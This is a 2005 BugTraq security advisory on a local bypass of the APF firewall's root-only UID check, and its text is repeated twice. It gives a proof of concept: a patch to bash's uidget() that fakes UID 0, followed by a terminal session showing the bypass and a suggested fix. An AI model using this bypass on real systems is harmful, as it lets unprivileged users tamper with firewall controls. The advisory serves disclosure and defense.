BugTraq
Back to list
|
Post reply
SB2005002: pron to bypass APF checking uid(0) routine
Jan 13 2005 04:32AM
x90c (jyj9782 kornet net)
=====================================================
SB2005002: pron to bypass APF checking uid(0) routine
-----------------------------------------------------
Date : 01-13-2005
Author : x90c (at) www.chollian (dot) net [email concealed]/~jyj9782
----- Affected Version -----
apf-0.9.4-7 ( current at this time )
----- Summary -----
APF is a policy based iptables firewall system designed for ease of use and
configuration. It employs a subset of features to satisfy the veteran
Linux user and the novice alike. Packaged in tar.gz and RPM formats, APF is
ideal for deployment in any linux server environment.
tarball From the website ( http://www.r-fx.org/apf.php ).
1) Smallest Flaw
When below PoC commands are executed, which allows localusers to bypass
the (only can use root) checking. therefore maybe an malicous user will can
free to use admin scripts(apf, firewall..) such as changing rules or
start/stop deamon and so on..
it's very dangerous from smallest things.
but it might be didn't happen,, because this program has install.sh.
it contains of "chmod 750 $INSPATH/firewall" .. but i can advise potentialities~
----- PoC -----
STEP 1) Patch your bash source (vi shell.c +1099) as below.
+ u = 0;
+ current_user.gid = 0;
+ current_user.euid = 0;
+ current_user.egid = 0;
-shell.c +1099-
static int
uidget ()
{
uid_t u;
u = 0;
if (current_user.uid != u)
{
FREE (current_user.user_name);
FREE (current_user.shell);
FREE (current_user.home_dir);
current_user.user_name = current_user.shell = current_user.home_dir = (char *)NULL;
}
current_user.uid = u;
current_user.gid = 0;
current_user.euid = 0;
current_user.egid = 0;
/* See whether or not we are running setuid or setgid. */
return (current_user.uid != current_user.euid) ||
(current_user.gid != current_user.egid);
}
STEP 2) run vulerable scripts only for root (0) using patched bash shell.
root@testbed:/home/s/apf-0.9.4-7# ls
CHANGELOG README apf.init files logrotate.d.apf
COPYING.GPL README.antidos cron.daily install.sh
root@testbed:/home/s/apf-0.9.4-7# cd files
root@testbed:/home/s/apf-0.9.4-7/files# ls
VERSION apf deny_hosts.rules extras log.rules sysctl.rules
ad bt.rules doc firewall main.rules vnet
allow_hosts.rules conf.apf ds_hosts.rules internals preroute.rules
root@testbed:/home/s/apf-0.9.4-7/files# grep "UID" *
apf:if [ "$UID" != "0" ]; then
firewall:if [ "$UID" != "0" ]; then
root@testbed:/home/s/apf-0.9.4-7/files#
i don't want to install and so i just only tested as below.
root@testbed:/tmp# ls -al b* f*
-rwxr-xr-x 1 pt pt 2969870 2005-01-08 01:23 bash90
-rwxrwxr-x 1 root root 24 2005-01-08 01:23 fake_firewall
root@testbed:/tmp# su pt
pt@testbed:/tmp$ id
uid=1001(pt) gid=1001(pt) groups=1001(pt),101(wheel)
pt@testbed:/tmp$ echo $UID
1001
pt@testbed:/tmp$ ./bash90
root@testbed:/tmp# echo $UID
0
root@testbed:/tmp# id
uid=1001(pt) gid=1001(pt) groups=1001(pt),101(wheel)
root@testbed:/tmp# ./fake_firewall
1001
root@testbed:/tmp# exit
exit
pt@testbed:/tmp$ ./bash90 fake_firewall
0
pt@testbed:/tmp$
----- Solution -----
# cp /bin/id /firewall_path/secure_id
# chmod 700 /firewall_path/secure_id
and changed the sources to get uid by right above file..
or i recommend upgrade new release to you..
----- Credits -----
This smallest flaw was found by x90c(Kyong Joo, Jung) personaly.
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
=====================================================
SB2005002: pron to bypass APF checking uid(0) routine
-----------------------------------------------------
Date : 01-13-2005
Author : x90c (at) www.chollian (dot) net [email concealed]/~jyj9782
----- Affected Version -----
apf-0.9.4-7 ( current at this time )
----- Summary -----
APF is a policy based iptables firewall system designed for ease of use and
configuration. It employs a subset of features to satisfy the veteran
Linux user and the novice alike. Packaged in tar.gz and RPM formats, APF is
ideal for deployment in any linux server environment.
tarball From the website ( http://www.r-fx.org/apf.php ).
1) Smallest Flaw
When below PoC commands are executed, which allows localusers to bypass
the (only can use root) checking. therefore maybe an malicous user will can
free to use admin scripts(apf, firewall..) such as changing rules or
start/stop deamon and so on..
it's very dangerous from smallest things.
but it might be didn't happen,, because this program has install.sh.
it contains of "chmod 750 $INSPATH/firewall" .. but i can advise potentialities~
----- PoC -----
STEP 1) Patch your bash source (vi shell.c +1099) as below.
+ u = 0;
+ current_user.gid = 0;
+ current_user.euid = 0;
+ current_user.egid = 0;
-shell.c +1099-
static int
uidget ()
{
uid_t u;
u = 0;
if (current_user.uid != u)
{
FREE (current_user.user_name);
FREE (current_user.shell);
FREE (current_user.home_dir);
current_user.user_name = current_user.shell = current_user.home_dir = (char *)NULL;
}
current_user.uid = u;
current_user.gid = 0;
current_user.euid = 0;
current_user.egid = 0;
/* See whether or not we are running setuid or setgid. */
return (current_user.uid != current_user.euid) ||
(current_user.gid != current_user.egid);
}
STEP 2) run vulerable scripts only for root (0) using patched bash shell.
root@testbed:/home/s/apf-0.9.4-7# ls
CHANGELOG README apf.init files logrotate.d.apf
COPYING.GPL README.antidos cron.daily install.sh
root@testbed:/home/s/apf-0.9.4-7# cd files
root@testbed:/home/s/apf-0.9.4-7/files# ls
VERSION apf deny_hosts.rules extras log.rules sysctl.rules
ad bt.rules doc firewall main.rules vnet
allow_hosts.rules conf.apf ds_hosts.rules internals preroute.rules
root@testbed:/home/s/apf-0.9.4-7/files# grep "UID" *
apf:if [ "$UID" != "0" ]; then
firewall:if [ "$UID" != "0" ]; then
root@testbed:/home/s/apf-0.9.4-7/files#
i don't want to install and so i just only tested as below.
root@testbed:/tmp# ls -al b* f*
-rwxr-xr-x 1 pt pt 2969870 2005-01-08 01:23 bash90
-rwxrwxr-x 1 root root 24 2005-01-08 01:23 fake_firewall
root@testbed:/tmp# su pt
pt@testbed:/tmp$ id
uid=1001(pt) gid=1001(pt) groups=1001(pt),101(wheel)
pt@testbed:/tmp$ echo $UID
1001
pt@testbed:/tmp$ ./bash90
root@testbed:/tmp# echo $UID
0
root@testbed:/tmp# id
uid=1001(pt) gid=1001(pt) groups=1001(pt),101(wheel)
root@testbed:/tmp# ./fake_firewall
1001
root@testbed:/tmp# exit
exit
pt@testbed:/tmp$ ./bash90 fake_firewall
0
pt@testbed:/tmp$
----- Solution -----
# cp /bin/id /firewall_path/secure_id
# chmod 700 /firewall_path/secure_id
and changed the sources to get uid by right above file..
or i recommend upgrade new release to you..
----- Credits -----
This smallest flaw was found by x90c(Kyong Joo, Jung) personaly.
[ reply ]